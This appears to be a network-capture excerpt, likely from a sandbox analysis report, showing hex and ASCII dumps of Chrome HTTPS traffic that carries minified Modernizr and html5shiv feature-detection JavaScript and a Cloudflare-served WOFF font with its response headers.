                                                                                                                                                                                                                                                                                                              2023-10-25 16:27:17 UTC43INData Raw: 61 72 20 74 3d 74 68 69 73 3b 69 66 28 22 66 75 6e 63 74 69 6f 6e 22 21 3d 74 79 70 65 6f 66 20 74 29 74 68 72 6f 77 20 6e 65 77 20 54 79 70 65 45 72 72 6f 72 3b 76 61 72 20 6e 3d 44 2e 63 61 6c 6c 28 61 72 67 75 6d 65 6e 74 73 2c 31 29 2c 72 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 69 66 28 74 68 69 73 20 69 6e 73 74 61 6e 63 65 6f 66 20 72 29 7b 76 61 72 20 6f 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 7d 3b 6f 2e 70 72 6f 74 6f 74 79 70 65 3d 74 2e 70 72 6f 74 6f 74 79 70 65 3b 76 61 72 20 61 3d 6e 65 77 20 6f 2c 69 3d 74 2e 61 70 70 6c 79 28 61 2c 6e 2e 63 6f 6e 63 61 74 28 44 2e 63 61 6c 6c 28 61 72 67 75 6d 65 6e 74 73 29 29 29 3b 72 65 74 75 72 6e 20 4f 62 6a 65 63 74 28 69 29 3d 3d 3d 69 3f 69 3a 61 7d 72 65 74 75 72 6e 20 74 2e 61 70 70 6c 79 28 65 2c 6e 2e
                                                                                                                                                                                                                                                                                                              Data Ascii: ar t=this;if("function"!=typeof t)throw new TypeError;var n=D.call(arguments,1),r=function(){if(this instanceof r){var o=function(){};o.prototype=t.prototype;var a=new o,i=t.apply(a,n.concat(D.call(arguments)));return Object(i)===i?i:a}return t.apply(e,n.
                                                                                                                                                                                                                                                                                                              2023-10-25 16:27:17 UTC44INData Raw: 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 22 57 65 62 53 6f 63 6b 65 74 22 69 6e 20 65 7c 7c 22 4d 6f 7a 57 65 62 53 6f 63 6b 65 74 22 69 6e 20 65 7d 2c 4d 2e 72 67 62 61 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 72 28 22 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 72 67 62 61 28 31 35 30 2c 32 35 35 2c 31 35 30 2c 2e 35 29 22 29 2c 69 28 62 2e 62 61 63 6b 67 72 6f 75 6e 64 43 6f 6c 6f 72 2c 22 72 67 62 61 22 29 7d 2c 4d 2e 68 73 6c 61 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 72 28 22 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 68 73 6c 61 28 31 32 30 2c 34 30 25 2c 31 30 30 25 2c 2e 35 29 22 29 2c 69 28 62 2e 62 61 63 6b 67 72 6f 75 6e 64 43 6f 6c 6f 72 2c 22 72 67 62 61 22 29 7c 7c 69 28 62 2e 62 61 63 6b
                                                                                                                                                                                                                                                                                                              Data Ascii: nction(){return"WebSocket"in e||"MozWebSocket"in e},M.rgba=function(){return r("background-color:rgba(150,255,150,.5)"),i(b.backgroundColor,"rgba")},M.hsla=function(){return r("background-color:hsla(120,40%,100%,.5)"),i(b.backgroundColor,"rgba")||i(b.back
                                                                                                                                                                                                                                                                                                              2023-10-25 16:27:17 UTC46INData Raw: 6e 73 66 6f 72 6d 2d 33 64 29 7b 23 6d 6f 64 65 72 6e 69 7a 72 7b 6c 65 66 74 3a 39 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 68 65 69 67 68 74 3a 33 70 78 3b 7d 7d 22 2c 66 75 6e 63 74 69 6f 6e 28 74 29 7b 65 3d 39 3d 3d 3d 74 2e 6f 66 66 73 65 74 4c 65 66 74 26 26 33 3d 3d 3d 74 2e 6f 66 66 73 65 74 48 65 69 67 68 74 7d 29 2c 65 7d 2c 4d 2e 63 73 73 74 72 61 6e 73 69 74 69 6f 6e 73 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 75 28 22 74 72 61 6e 73 69 74 69 6f 6e 22 29 7d 2c 4d 2e 66 6f 6e 74 66 61 63 65 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 65 3b 72 65 74 75 72 6e 20 46 28 27 40 66 6f 6e 74 2d 66 61 63 65 20 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 22 66 6f 6e 74 22 3b 73 72 63 3a 75 72 6c 28 22 68 74 74 70 73
                                                                                                                                                                                                                                                                                                              Data Ascii: nsform-3d){#modernizr{left:9px;position:absolute;height:3px;}}",function(t){e=9===t.offsetLeft&&3===t.offsetHeight}),e},M.csstransitions=function(){return u("transition")},M.fontface=function(){var e;return F('@font-face {font-family:"font";src:url("https
                                                                                                                                                                                                                                                                                                              2023-10-25 16:27:17 UTC47INData Raw: 6f 63 61 6c 73 74 6f 72 61 67 65 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 74 72 79 7b 72 65 74 75 72 6e 20 6c 6f 63 61 6c 53 74 6f 72 61 67 65 2e 73 65 74 49 74 65 6d 28 76 2c 76 29 2c 6c 6f 63 61 6c 53 74 6f 72 61 67 65 2e 72 65 6d 6f 76 65 49 74 65 6d 28 76 29 2c 21 30 7d 63 61 74 63 68 28 65 29 7b 72 65 74 75 72 6e 21 31 7d 7d 2c 4d 2e 73 65 73 73 69 6f 6e 73 74 6f 72 61 67 65 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 74 72 79 7b 72 65 74 75 72 6e 20 73 65 73 73 69 6f 6e 53 74 6f 72 61 67 65 2e 73 65 74 49 74 65 6d 28 76 2c 76 29 2c 73 65 73 73 69 6f 6e 53 74 6f 72 61 67 65 2e 72 65 6d 6f 76 65 49 74 65 6d 28 76 29 2c 21 30 7d 63 61 74 63 68 28 65 29 7b 72 65 74 75 72 6e 21 31 7d 7d 2c 4d 2e 77 65 62 77 6f 72 6b 65 72 73 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65
                                                                                                                                                                                                                                                                                                              Data Ascii: ocalstorage=function(){try{return localStorage.setItem(v,v),localStorage.removeItem(v),!0}catch(e){return!1}},M.sessionstorage=function(){try{return sessionStorage.setItem(v,v),sessionStorage.removeItem(v),!0}catch(e){return!1}},M.webworkers=function(){re
                                                                                                                                                                                                                                                                                                              2023-10-25 16:27:17 UTC48INData Raw: 22 3d 3d 74 79 70 65 6f 66 20 65 3f 65 2e 73 70 6c 69 74 28 22 20 22 29 3a 65 7d 66 75 6e 63 74 69 6f 6e 20 6f 28 65 29 7b 76 61 72 20 74 3d 76 5b 65 5b 68 5d 5d 3b 72 65 74 75 72 6e 20 74 7c 7c 28 74 3d 7b 7d 2c 67 2b 2b 2c 65 5b 68 5d 3d 67 2c 76 5b 67 5d 3d 74 29 2c 74 7d 66 75 6e 63 74 69 6f 6e 20 61 28 65 2c 6e 2c 72 29 7b 69 66 28 6e 7c 7c 28 6e 3d 74 29 2c 6c 29 72 65 74 75 72 6e 20 6e 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 65 29 3b 72 7c 7c 28 72 3d 6f 28 6e 29 29 3b 76 61 72 20 61 3b 72 65 74 75 72 6e 20 61 3d 72 2e 63 61 63 68 65 5b 65 5d 3f 72 2e 63 61 63 68 65 5b 65 5d 2e 63 6c 6f 6e 65 4e 6f 64 65 28 29 3a 70 2e 74 65 73 74 28 65 29 3f 28 72 2e 63 61 63 68 65 5b 65 5d 3d 72 2e 63 72 65 61 74 65 45 6c 65 6d 28 65 29 29 2e 63 6c 6f 6e 65
                                                                                                                                                                                                                                                                                                              Data Ascii: "==typeof e?e.split(" "):e}function o(e){var t=v[e[h]];return t||(t={},g++,e[h]=g,v[g]=t),t}function a(e,n,r){if(n||(n=t),l)return n.createElement(e);r||(r=o(n));var a;return a=r.cache[e]?r.cache[e].cloneNode():p.test(e)?(r.cache[e]=r.createElem(e)).clone
                                                                                                                                                                                                                                                                                                              2023-10-25 16:27:17 UTC50INData Raw: 72 6f 6e 67 7c 73 74 79 6c 65 7c 74 61 62 6c 65 7c 74 62 6f 64 79 7c 74 64 7c 74 68 7c 74 72 7c 75 6c 29 24 2f 69 2c 68 3d 22 5f 68 74 6d 6c 35 73 68 69 76 22 2c 67 3d 30 2c 76 3d 7b 7d 3b 21 66 75 6e 63 74 69 6f 6e 28 29 7b 74 72 79 7b 76 61 72 20 65 3d 74 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 22 61 22 29 3b 65 2e 69 6e 6e 65 72 48 54 4d 4c 3d 22 3c 78 79 7a 3e 3c 2f 78 79 7a 3e 22 2c 75 3d 22 68 69 64 64 65 6e 22 69 6e 20 65 2c 6c 3d 31 3d 3d 65 2e 63 68 69 6c 64 4e 6f 64 65 73 2e 6c 65 6e 67 74 68 7c 7c 66 75 6e 63 74 69 6f 6e 28 29 7b 74 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 22 61 22 29 3b 76 61 72 20 65 3d 74 2e 63 72 65 61 74 65 44 6f 63 75 6d 65 6e 74 46 72 61 67 6d 65 6e 74 28 29 3b 72 65 74 75 72 6e 22 75 6e 64 65 66 69 6e 65 64 22
                                                                                                                                                                                                                                                                                                              Data Ascii: rong|style|table|tbody|td|th|tr|ul)$/i,h="_html5shiv",g=0,v={};!function(){try{var e=t.createElement("a");e.innerHTML="<xyz></xyz>",u="hidden"in e,l=1==e.childNodes.length||function(){t.createElement("a");var e=t.createDocumentFragment();return"undefined"
                                                                                                                                                                                                                                                                                                              2023-10-25 16:27:17 UTC51INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                              Data Ascii: 0


                                                                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                                                                                                                                              70104.21.0.95443192.168.2.1649800C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                              TimestampkBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                              2023-10-25 16:27:40 UTC808INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                              Date: Wed, 25 Oct 2023 16:27:40 GMT
                                                                                                                                                                                                                                                                                                              Content-Type: font/woff
                                                                                                                                                                                                                                                                                                              Content-Length: 36696
                                                                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                                                                              Last-Modified: Fri, 25 Aug 2023 04:00:28 GMT
                                                                                                                                                                                                                                                                                                              ETag: "8f58-603b762947b93"
                                                                                                                                                                                                                                                                                                              Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                                                                              X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                                                              X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                                                                                              X-Frame-Options: DENY
                                                                                                                                                                                                                                                                                                              Content-Security-Policy: frame-ancestors 'none'
                                                                                                                                                                                                                                                                                                              Cache-Control: max-age=14400
                                                                                                                                                                                                                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=ZniT1VsXKJc%2FiDo1ivQUu7XVMWNnV7RABPQ5Mt%2B%2FA3Z9USYcSGHS34k7SCNyV6XNQmYM3lTydSVcLQNCVOAln58PX%2BnhBSKNNUeEKy2EmBPJnJpHx%2BcIFS6sz5p9yHFI6LR31PnGjwRJW8I%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                                                              Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                                                                              CF-Cache-Status: HIT
                                                                                                                                                                                                                                                                                                              Age: 9458
                                                                                                                                                                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                              Server: cloudflare
                                                                                                                                                                                                                                                                                                              CF-RAY: 81bbd407fc843964-IAD
                                                                                                                                                                                                                                                                                                              2023-10-25 16:27:40 UTC809INData Raw: 77 4f 46 46 00 01 00 00 00 00 8f 58 00 11 00 00 00 01 36 90 00 01 00 00 00 00 8e 30 00 00 01 28 00 00 02 97 00 00 00 00 00 00 00 00 44 53 49 47 00 00 8e 28 00 00 00 08 00 00 00 08 00 00 00 01 47 50 4f 53 00 00 01 80 00 00 18 99 00 00 5e 3e 80 e1 18 da 47 53 55 42 00 00 1a 1c 00 00 02 ad 00 00 04 96 8c 33 79 b9 4f 53 2f 32 00 00 1c cc 00 00 00 46 00 00 00 60 68 60 7b 5a 63 6d 61 70 00 00 1d 14 00 00 05 1a 00 00 07 3c 97 3f 2b 12 63 76 74 20 00 00 87 b0 00 00 00 30 00 00 00 3c 28 d6 01 ad 66 70 67 6d 00 00 87 e0 00 00 05 c1 00 00 0b e2 3f ae 1b 9f 67 61 73 70 00 00 87 a8 00 00 00 08 00 00 00 08 00 00 00 10 67 6c 79 66 00 00 22 30 00 00 54 6c 00 00 a0 68 11 94 2e 2b 68 65 61 64 00 00 76 9c 00 00 00 34 00 00 00 36 1a bb 7d da 68 68 65 61 00 00 76 d0 00 00 00
                                                                                                                                                                                                                                                                                                              Data Ascii: wOFFX60(DSIG(GPOS^>GSUB3yOS/2F`h`{Zcmap<?+cvt 0<(fpgm?gaspglyf"0Tlh.+headv46}hheav
                                                                                                                                                                                                                                                                                                              2023-10-25 16:27:40 UTC809INData Raw: 9b ff f9 ee b9 f7 dd f7 f2 92 80 5a 5f d2 b9 df ef bc bb 9c 73 cf f9 ce b7 9f e5 3e 52 44 14 a0 e1 f4 0b 4a ba f1 e6 e1 77 52 c6 2f ee ff d5 23 d4 93 2c 3c 27 66 d2 f9 99 94 34 62 f8 8d 7d 28 f7 ce 91 c3 fa 50 1f f3 5c 99 73 92 39 27 93 f5 cf a3 1f c5 bb 2d 7f 51 87 92 64 e9 d2 48 81 40 25 ee d6 4b 2b 0f a8 97 d5 34 55 97 34 2e a9 2e 79 78 f2 33 d6 99 d6 44 6b 66 4a b7 94 33 53 2e 48 19 08 18 9a f2 b1 7f 7c ca 16 a4 1d be 91 fe f1 fe f1 be 25 be 42 7f aa be 12 18 0a b8 c3 ff b0 ff 57 b8 7e 1c f0 9f 6e 4e 3c 78 ce 3f d1 ff ae 7f 7d 6a 6e ea 05 a9 57 a7 0e 4d bd 37 f5 f1 d4 3f a4 be 9c 3a 2d 75 41 6a 51 ea be 34 4a f3 a5 5d 92 76 6d da f0 b4 07 d2 9e 48 7b 26 ed 0d 81 79 81 9c 40 cf c0 83 81 47 03 8f 05 7e 1b 18 17 98 18 d8 12 78 3d f0 56 a0 08 67 0d 3b d0
                                                                                                                                                                                                                                                                                                              Data Ascii: Z_s>RDJwR/#,<'f4b}(P\s9'-QdH@%K+4U4..yx3DkfJ3S.H|%BW~nN<x?}jnWM7?:-uAjQ4J]vmH{&y@G~x=Vg;
                                                                                                                                                                                                                                                                                                              2023-10-25 16:27:40 UTC811INData Raw: 1f 74 39 e4 6a ae 70 ea 52 78 a9 f9 e4 97 f2 b3 e4 77 ad fc 96 ca ef 1e 4a 85 c4 97 40 e2 43 82 51 a1 d0 70 1f b8 16 56 85 78 bf 08 2d f8 50 62 ae 94 28 40 89 65 7c 18 14 08 a0 d4 ef 40 8f 3c ba 0b 36 e4 2a e4 d4 1b 3b 52 49 ab 79 aa b1 25 87 20 b5 ef c2 3a fd 19 52 fb 96 ea cd 2b 20 b9 1f aa 11 bc 11 bc d2 9a 74 19 7a f4 a9 5a 0c 7f 60 a1 a6 4c d4 04 ba 00 d7 42 9c 9d 27 b0 4f b0 a0 c0 05 b2 65 fb a7 90 94 41 3e 6f c2 5d b9 e0 bc 18 f7 7e 3c 19 8b 37 b2 80 c9 2a bc d1 53 63 a1 e6 d0 10 b4 10 92 b7 75 f9 ed ba bc dc ed c2 dd 2e dc d5 81 42 25 28 91 82 67 6b f0 2c 6c 53 02 fd 2e 91 92 fa 89 f4 1c 7a a8 a9 f5 84 a1 c3 0e d3 cb 5a b4 d1 5d b7 a1 8a f8 a4 c6 42 f0 0e a2 c4 21 69 4b 73 78 0e 5d 21 58 28 d8 95 20 fa 14 29 13 32 65 34 a6 57 ab a5 a8 0d cf 40 fb
                                                                                                                                                                                                                                                                                                              Data Ascii: t9jpRxwJ@CQpVx-Pb(@e|@<6*;RIy% :R+ tzZ`LB'OeA>o]~<7*Scu.B%(gk,lS.zZ]B!iKsx]!X( )2e4W@
                                                                                                                                                                                                                                                                                                              2023-10-25 16:27:40 UTC812INData Raw: 01 2e 6a dd c3 0b ce 7a 95 a0 8e fe 1e 8e 60 87 90 99 43 36 bd 4d 6c 52 de a9 28 98 09 79 bd 9f a7 f0 28 8c 33 ca 45 82 8e 45 62 44 59 6f da 85 51 d5 71 de 84 b4 5d cf b8 ca 31 40 cf d5 68 ab c4 0d 28 71 38 41 74 0f 9f aa 85 8e bb 76 d0 19 0f 7f 87 b4 99 5a 0e 2a e4 6a 4b 4b 0c 45 a6 42 ee f3 f4 8e 38 fa 6b 75 bc 1a 3e f5 b2 df 02 86 0b 79 32 8d a6 5b e8 07 b8 7e 87 37 1a 5d fd 39 cf 91 dc 37 79 1b 34 b8 1a 3e aa 94 4b e5 c9 4c f3 de 1e fe 00 bf 9f e1 b2 5b a2 e7 98 dc be ac ef bc 4a e8 19 e1 85 3b c5 fc 63 36 fd 3f 39 3a 10 37 f2 f9 43 fe 25 cf e7 67 f4 aa 92 8e 09 ec 88 cb d1 3f f8 d4 2f 78 07 e4 e7 59 de 27 33 7a 51 71 a4 ac 37 7c c9 f3 3a 00 45 9b e0 f7 6b 29 5b e6 e4 eb 78 b6 79 9c 1c d9 99 24 d6 27 e8 59 3b f3 99 f9 05 2b f1 d2 c0 c7 e0 9b 82 b2 d7
                                                                                                                                                                                                                                                                                                              Data Ascii: .jz`C6MlR(y(3EEbDYoQq]1@h(q8AtvZ*jKKEB8ku>y2[~7]97y4>KL[J;c6?9:7C%g?/xY'3zQq7|:Ek)[xy$'Y;+
                                                                                                                                                                                                                                                                                                              2023-10-25 16:27:40 UTC813INData Raw: 24 e6 4f b2 0f 4c 53 41 7f 33 f0 5a 3b 1d 48 f5 f8 bd 1d a0 50 19 f5 76 65 56 4b 74 bd ec d0 af 6e 4b e3 23 da 26 d6 b1 c9 b3 a3 b8 3a 56 c7 e5 db b6 c8 93 6a 23 dd 46 8a be da 1e 53 f0 9e 63 e2 55 1d fb 86 75 ff e3 45 9e 62 cd 5a 8c bd cd 8a c9 4a 48 da c7 f6 4c 89 bb 07 27 e4 c5 58 c7 f6 26 16 73 ea 5b 01 1b f4 8d ec 73 d4 a3 6c a1 fb 09 ad 8d 11 1a 8a ad 30 d1 8d 6d 73 e2 e0 6e 41 27 65 0e cd 9e c1 94 1d 75 14 65 83 0e d9 96 5e f2 cb 44 47 4a 21 8f e5 b0 d2 da 4e 9f 7e 1c d9 64 c7 62 c6 9e 87 a5 c6 10 6c 66 7d 74 74 ed ec 19 8f 3f ef 6e 76 41 57 a3 b6 45 ad c7 f9 a0 48 9d eb 11 c2 46 8f 37 c2 7e d5 9f c6 d8 b1 07 de 7c 88 e7 f0 b3 12 07 54 bb b3 c0 9a 97 c9 e0 76 03 b4 79 0e a4 7d 2d f4 6b 83 fb 96 ec 64 6a ae 10 6a 96 1a 6c f9 14 34 ab dd 51 39 6c 42
                                                                                                                                                                                                                                                                                                              Data Ascii: $OLSA3Z;HPveVKtnK#&:Vj#FScUuEbZJHL'X&s[sl0msnA'eue^DGJ!N~dblf}tt?nvAWEHF7~|Tvy}-kdjjl4Q9lB
                                                                                                                                                                                                                                                                                                              2023-10-25 16:27:40 UTC815INData Raw: ea 0e e5 57 bf 56 7f 50 df 53 cf a8 97 d5 dd ea 15 c0 83 6a 8a 9a a1 46 ab 99 6a 96 7a 58 cd 06 3c a2 e6 00 fe 55 2d 50 0b d5 bf a9 f7 54 a1 7a 54 15 01 9e 50 2b d4 c7 ea 37 ea 13 55 ac 7e 27 ff 6e 3a 56 7d ae 36 a8 71 fa 5f 6a d5 e7 74 09 0d 04 6e 57 d1 10 1a 84 27 83 e9 6a c0 35 74 2d 46 93 fa 6a 88 fc 1b d1 0d f4 3d ba 91 1e 84 dd b8 09 b2 76 33 c6 ab 83 00 03 01 83 50 e6 41 94 1a 22 7d bd de c8 e6 35 28 31 0a bf 77 49 1a d8 26 0c 42 db 0e 0c 91 7a e3 c1 60 03 57 c7 81 6b 0c be d7 c9 18 38 f2 7c 48 2b 70 3d fa 73 83 f4 c9 81 1b 05 1e 6c 03 6e 32 70 b3 0b df 77 61 14 dd 42 b7 d2 50 1a 4d 23 c0 eb db e9 6e 1a 09 b8 0b f0 43 3c bb 1b f0 23 e4 17 d0 7d f4 53 fa 19 72 2e a7 fb e9 0a f0 7d 14 ca 8f 40 de 2d f8 1d 89 f3 48 f1 e3 77 e3 ad 3e 38 ff 18 ef f4 c6
                                                                                                                                                                                                                                                                                                              Data Ascii: WVPSjFjzX<U-PTzTP+7U~'n:V}6q_jtnW'j5t-Fj=v3PA"}5(1wI&Bz`Wk8|H+p=sln2pwaBPM#nC<#}Sr.}@-Hw>8
                                                                                                                                                                                                                                                                                                              2023-10-25 16:27:40 UTC816INData Raw: 2e 9e de b2 4f ed d1 63 6a b4 fd 60 53 6d ed 23 53 fd 9f 4a db b2 ee 2b 1a a3 2c d7 3e 53 96 5b f1 6a 9b 32 f4 1a 87 02 d3 d5 aa 37 92 fa bf 74 81 bb 45 00 00 00 78 da 63 60 66 99 c2 64 ca c0 ca c0 c2 6a cc 72 86 81 81 61 26 84 66 02 e1 08 06 54 c0 8e cc 71 73 74 f3 07 52 0a bf 59 d8 72 fe e5 30 9c e0 d8 cf c4 a2 c0 c0 30 19 24 c7 fc 82 2d 07 24 c7 c0 0c 00 28 b2 0c 93 00 00 78 da 8d 95 09 94 4e 65 1c c6 7f cf 9d 45 a1 6c 61 b2 5c 77 3e 4c a4 84 8c ad 45 cb 0c 2a 29 a4 42 34 4a cb 90 f6 4c 08 63 8b 12 c3 60 b4 20 23 86 66 d0 31 46 26 46 06 43 b6 2c 61 8c f5 fb be f6 68 9f 16 4b 66 fa cf 52 a7 3a 75 f4 9e f3 de f7 fe cf 7b ee bd cf b9 ff e7 f7 bc 40 08 65 b3 1e b2 2b 61 31 56 a9 b4 0e 0d 6b 62 6b 0a 89 84 53 8b ab 68 cf 0d f4 21 8e 78 06 31 9c 51 2c 65 05
                                                                                                                                                                                                                                                                                                              Data Ascii: .Ocj`Sm#SJ+,>S[j27tExc`fdjra&fTqstRYr00$-$(xNeEla\w>LE*)B4JLc` #f1F&FC,ahKfR:u{@e+a1VkbkSh!x1Q,e
                                                                                                                                                                                                                                                                                                              2023-10-25 16:27:40 UTC817INData Raw: 25 9d dc a2 03 c6 dd 5c ed d6 db 76 5a 8d 26 9f 83 d6 d3 24 eb f0 48 ed b5 2c e8 6a 89 d0 dd 72 a0 8c ff be a5 ec 63 19 50 42 fd 24 96 ab 97 79 ac 5f b9 df e2 d4 d3 3c 77 f7 ef a7 1d ba 82 00 00 78 da d4 bd 79 5c 94 c7 fd 07 fe cc 3c cf b3 bb dc 2c 0b 2c 37 2c 0b ec 72 c8 b5 c0 72 09 2b ca 21 97 e2 c5 25 2a 97 5c 8a 8a 28 e2 ad 20 1e 68 bc af 18 35 c6 78 e5 34 51 73 36 26 69 92 26 69 da e6 68 9b 34 6d 9a 6f da a6 89 3d 6d da a4 4d 94 7d f8 7d 66 9e 67 1f 96 85 4d da fc 5e bf 3f 7e 69 71 61 f6 3d 33 9f f9 cc 67 3e f3 f9 cc 7c 66 86 c1 cc c3 0c c3 7e c6 de 64 58 46 c9 a8 6e f0 1c 66 70 72 bc 46 a7 d6 45 ab 75 ea 87 d9 9c 91 d7 f0 97 d6 b9 ec cd 91 82 62 36 79 e4 1d 86 61 10 d3 c9 34 a8 da b8 53 8c 8a 89 b1 e8 31 42 0c 2a 65 11 53 82 10 2a 86 af 11 33 9f a0
                                                                                                                                                                                                                                                                                                              Data Ascii: %\vZ&$H,jrcPB$y_<wxy\<,,7,rr+!%*\( h5x4Qs6&i&ih4mo=mM}}fgM^?~iqa=3g>|f~dXFnfprFEub6ya4S1B*eS*3
                                                                                                                                                                                                                                                                                                              2023-10-25 16:27:40 UTC819INData Raw: ed 69 31 9f 22 92 8e 4f e8 03 57 25 06 a2 50 29 a2 7d 00 04 d2 dc 3e 3e 6a 1f 51 82 81 28 d2 05 40 19 b0 f2 16 ba 89 5e fc fc 7e a1 e8 94 50 72 16 8a cb e6 7e 74 67 3d 77 f9 6e 0d f9 91 c7 c7 6b 74 7c 84 59 82 95 50 98 5c 34 8b c4 92 a1 60 4e 19 40 0a 26 7d 4b 4a bd 84 af 9c bd 68 5d 40 0a 3c c4 75 43 81 2b ee 1e 24 7a 84 8c 8d 23 30 36 34 8c 81 99 62 89 03 91 96 24 9c 87 a2 64 0d e7 e7 8b 98 f0 50 5f 83 9f 01 04 1b ba 4d e1 20 d8 fe a2 5e 51 18 a8 42 4e c4 36 19 67 f9 8b 5f 9f 9b 35 eb dc d7 17 e1 73 f6 6c f8 dc f2 cc 1a b3 79 cd 33 5b b6 3c d3 6b 36 f7 3e a3 5e fb 3a 52 1e 38 80 54 3f 5a bb f6 75 e1 9b 03 07 84 af 7f b4 f6 58 c3 7d ef ad 5e fd de 7d 0d b6 4f 51 df 71 b3 a0 cd 9e 40 4e 9c c5 00 72 cc 20 cc a2 46 50 06 36 b5 40 9b ee ed e5 ef eb a5 f5 d6
                                                                                                                                                                                                                                                                                                              Data Ascii: i1"OW%P)}>>jQ(@^~Pr~tg=wnkt|YP\4`N@&}KJh]@<uC+$z#064b$dP_M ^QBN6g_5sly3[<k6>^:R8T?ZuX}^}OQq@Nr FP6@
                                                                                                                                                                                                                                                                                                              2023-10-25 16:27:40 UTC820INData Raw: 26 e3 cf 44 32 d1 4c 9e 25 c7 8f 07 bb 9d 76 33 f1 9b 9a 61 30 33 48 c1 34 a9 c0 6b 02 df 09 9c 13 62 ed 04 68 19 26 3a 0a b4 63 64 40 24 64 f5 37 aa d5 2e 20 b0 3a ea af c5 48 8a 51 f4 a1 90 a4 b4 a9 82 04 57 8e 4b a2 7e 1c ba 9b 9a 1f 91 51 1a 17 5b 9a a9 cb 4b 45 56 eb a5 94 02 8b 29 c5 52 90 04 ee 1d 75 ed 2c 01 4b 72 e3 4a 33 22 c2 cd a5 71 b9 8b 03 ee bc c8 6f 2f 48 49 9a 36 2d 29 a5 e0 f7 c4 e9 03 9f 52 a8 e2 4b 41 3e 03 81 af 33 2c d3 c0 d7 43 5a 7f cc 81 e8 7b c0 af 33 c1 96 42 98 47 4d 74 8e 21 03 8b 48 28 d8 db 30 d0 82 a9 33 15 ec eb e3 ee e6 ea a2 52 32 81 28 50 09 da 0f 45 02 e9 19 66 da 0a 13 52 10 8a 45 57 4a 81 80 f0 ae 25 cb cb 67 f4 89 4e e8 56 ac 6d 6d cf 4c 89 b3 04 94 46 af b0 fe 1c 68 16 aa 96 55 17 6e 4a 40 33 89 57 7a 67 bd 61 75
                                                                                                                                                                                                                                                                                                              Data Ascii: &D2L%v3a03H4kbh&:cd@$d7. :HQWK~Q[KEV)Ru,KrJ3"qo/HI6-)RKA>3,CZ{3BGMt!H(03R2(PEfREWJ%gNVmmLFhUnJ@3Wzgau
                                                                                                                                                                                                                                                                                                              2023-10-25 16:27:40 UTC821INData Raw: b8 3c c1 a2 67 f0 9e ab a6 78 19 a3 cc 02 0c 47 31 cd 78 0f 3a 0b 18 8c 9e 41 67 9d 60 5a 9c 62 9a 64 4c 9b 53 cc 34 19 d3 ee 14 63 96 31 1d 4e 31 33 64 4c a7 53 4c 94 8c e9 b6 61 b0 03 46 f1 4f 19 b3 02 0f 4f 52 0e 02 1e 3e c5 18 a0 96 61 56 cd 10 2c a2 ed 23 d8 a0 27 18 f4 0c ab 06 ec 13 08 5f 45 e4 93 95 32 cb fc 7f 41 2c 1f 4a 68 c3 fb d0 59 ca bf 83 ac 9e f1 91 eb 21 79 58 fd e4 79 3a e4 3c fb be 23 cf cd 09 79 a0 2f d9 28 c7 3c 51 df 9e a7 13 df cb 06 3a e6 09 9c 3c 4f 33 de cc 46 51 5e 40 5e 31 0f 2d de 8e 07 a2 df a4 4c 83 3c 61 a2 ec 70 d1 e8 5e 89 c7 f7 4a 3c a6 eb fe 54 be 14 92 7c 8d d0 7e 40 76 fd 20 62 9a 64 4c 9b 53 cc 34 19 d3 ee 14 13 2e 63 96 4f 86 b1 8e 90 7d 08 11 03 1a a4 07 df b5 8d 63 3e 4d 99 8b e9 38 a6 e5 bf 33 a1 2d 74 8d 9e b6
                                                                                                                                                                                                                                                                                                              Data Ascii: <gxG1x:Ag`ZbdLS4c1N13dLSLaFOOR>aV,#'_E2A,JhY!yXy:<#y/(<Q:<O3FQ^@^1-L<ap^J<T|~@v bdLS4.cO}c>M83-t
